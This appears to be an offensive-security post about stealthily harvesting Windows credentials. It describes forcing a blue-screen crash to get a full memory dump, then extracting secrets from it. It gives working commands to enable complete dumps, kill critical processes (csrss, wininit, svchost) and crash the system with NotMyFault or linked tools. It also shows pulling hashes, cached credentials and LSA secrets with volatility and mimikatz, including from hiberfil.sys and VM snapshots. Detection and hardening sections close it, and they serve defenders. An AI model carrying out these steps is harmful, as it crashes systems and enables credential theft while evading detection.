💀 Windows | Get passwords no one notices 🔑
Demo: https://t.me/DefenseEvasion/38
Intro
Local and domain cached credentials, tickets and so on are located on your RAM. But real-time extraction is noisy and can be easily detected.
One of existing solutions is to crash target system to get full memory dump, exfiltrate the file and process it remotely to defense evasion.
There are cases when you have to reboot the computer, but some servers and computers restrict system restarts. So BSoD also can help to bypass limitations.
In this article
- How to prepare the system to BSoD
- How to BSoD
- If not BSoD, where to get passwords from?
- How to extract credentials
- Squeezing every last drop of RAM to gather information
- Blue team tips
Before we BSoD
0. Check if there is enough disk space to memory dump
Full memory dump occupies as much disk space as RAM stores. If disk space is too low, this technique will not work
1. Make sure complete memory dump enabled
(Get-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Control\CrashControl -Name CrashDumpEnabled).CrashDumpEnabled -eq 1
1*. Enable if necessary
- GUI (System properties --> Advanced system settings --> Advanced --> Startup and Recovery --> Settings)
reg add HKLM\SYSTEM\CurrentControlSet\Control\CrashControl /t REG_DWORD /v CrashDumpEnabled /d 1 /f
Set-ItemProperty HKLM:\System\CurrentControlSet\Control\CrashControl -Name CrashDumpEnabled -Value 1 -Type DWord
2. Make sure MEMORY.DMP file can be created
(Get-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Control\CrashControl -Name Overwrite).Overwrite -eq 1
2*. Allow if necessary
reg add HKLM\SYSTEM\CurrentControlSet\Control\CrashControl /t REG_DWORD /v Overwrite /d 1 /f
Set-ItemProperty HKLM:\System\CurrentControlSet\Control\CrashControl -Name Overwrite -Value 1 -Type DWord
3. Make sure pagefile.sys size is enough
For Complete memory dump %SystemDrive%\pagefile.sys must be >= RAM size + 257 MB
How to BSoD
1. Terminate a critical process
taskkill /im csrss.exe /f taskkill /im wininit.exe /f taskkill /im svchost.exe /f
2. Start a critical process
wininit
This bug was fixed on Windows 11 Admin rights required
3. Start and kill your own critical process
C# implementation: https://github.com/GrumpBoat/ForceBSOD
ForceBSOD.exe
4. Ask a driver to cause problems
The custom driver can be used to generate BSoD. For example, NotMyFault from Sysinternals package works this way.
Sysinternals implementation: https://learn.microsoft.com/en-us/sysinternals/downloads/notmyfault
Supports both GUI and CLI and several ways to crash the system.
notmyfault.exe /crash
5*. CrashOnCtrlScroll
Set registry values depending on your keyboard. Create REG_DWORD CrashOnCtrlScroll and set 0x1 value under:
- PS/2: HKLM\System\CurrentControlSet\Services\i8042prt\Parameters
- USB: HKLM\System\CurrentControlSet\Services\kbdhid\Parameters
- Hyper-V: HKLM\System\CurrentControlSet\Services\hyperkbd\Parameters
Press and hold the Rightmost Ctrl and then press Scroll Lock twice
6*. Raise a NtRaiseHardError
- https://github.com/peewpw/Invoke-BSOD/tree/master
- https://github.com/u0932478239/no-admin-bsod
- https://github.com/blueskychan-dev/FuckedUP
Failed to extract passwords from MEMORY.DMP file which was created using this technique during tests
What else if not RAM?
1. Hiberfil.sys
Path: %SystemDrive%\hiberfil.sys
It stores compressed RAM before the system go to sleep / hibernation state. So you need to decompress it first.
Convert it to .dmp formats with one of these tools:
Hibr2Dmp.exe D:\Dumps\hiberfil.sys D:\Dumps\hiberfil.dmp
py vol.py -f D:\Dumps\hiberfil.sys imageinfo py vol.py -f D:\Dumps\hiberfil.sys imagecopy --profile=<your_profile> -O D:\Dumps\hiberfil.raw py vol.py -f D:\Dumps\hiberfil.raw --profile=<your_profile> raw2dmp -O D:\Dumps\hiberfil.dmp
*MoonSols Memory Toolkit is no longer officially distributed
2. Virtual Machine snaphot
Convert it to .dmp formats first following the general approach:
VmWare has vmss2core (Built-in tool for VmWare Workstation)
vmss2core.exe -W D:\Dumps\snapshot.vmsn D:\Dumps\snapshot.vmem
How to extract credentials
volatility3
py vol.py -f MEMORY.DMP windows.cachedump.Cachedump py vol.py -f MEMORY.DMP windows.hashdump.Hashdump py vol.py -f MEMORY.DMP windows.lsadump.Lsadump
WinDbg + mimilib.dll
.load D:\Tools\mimilib.dll !process 0 0 lsass.exe .process /r /p <NUMBER_FROM_PREVIOUS_STEP> !mimikatz
rekall + mimikatz plugin
Outdated and not recommended to use
🎁 Bonus
RAM also contains a lot of useful information:
- browsers' data
- password managers' data
- registry
- all running processes
Search for vulnerable services (unquoted service path, for example) or recon software installed
🔵 Detection
1. Security EventID 4688, Sysmon EventID 1, PowerShell/Operational EventID 4104
wmic recoveros set WriteToSystemLog = False wmic recoveros set DebugInfoType = 1 wmic recoveros set DebugFilePath = <path> wmic recoveros set OverwriteExistingDebugFile = 1 reg add HKLM\SYSTEM\CurrentControlSet\Control\CrashControl /t REG_DWORD /v CrashDumpEnabled /d 1 /f Set-ItemProperty HKLM:\System\CurrentControlSet\Control\CrashControl -Name CrashDumpEnabled -Value 1 -Type DWord taskkill /im <critical_process_name> Stop-Process <critical_process_name>
2. Sysmon EventID 13
2.1. Suspicious params of the memory crash dump
3. Security EventID 4697, System EventID 7045
Service File Name: %SystemRoot%\system32\drivers\myfault.sys
4. Sysmon EventID 11
5. System EventID 12, 6008, 1001
The crash dump file could not be created due to a lack of free space on the destination drive. Increasing the amount of free space on the destination drive may help prevent this error.
The previous system shutdown at HH:mm:ss on DD/MM/YYYY was unexpected.
The computer has rebooted from a bugcheck. The bugcheck was: 0x000000ef (0xffffab8ea3c6a080, 0x0000000000000000, 0x0000000000000000, 0x0000000000000000). A dump was saved in: C:\Windows\MEMORY.DMP. Report Id: <GUID>.
6. Sysmon EventID 6
Every time NotMyFault launches, this Sysmon EventID 6 is generated
7. Security EventID 4663
SACL on %SystemRoot%\MEMORY.DMP must be configured
File Access Auditing must be configrued:
auditpol /set /subcategory:"File System" /success:enable
💪🏻 Hardening
1. Turn off hibernation
powercfg /hibernate off
2. Restrict access to crash dumps files
Save crash dumps to folders which can be accessed by special users only (strong DACL)
3. Do not allow full memory dump
Configure GPO to periodically check CrashControl params, log a crash event to Event Log and disable full memory dump
reg add HKLM\SYSTEM\CurrentControlSet\Control\CrashControl /t REG_DWORD /v LogEvent /d 1 /f reg add HKLM\SYSTEM\CurrentControlSet\Control\CrashControl /t REG_DWORD /v CrashDumpEnabled /d 0 /f
Crash dumps can help you identify problems with your software, drivers, etc... So, it's not recommended to set CrashDumpEnabled value to 0x0.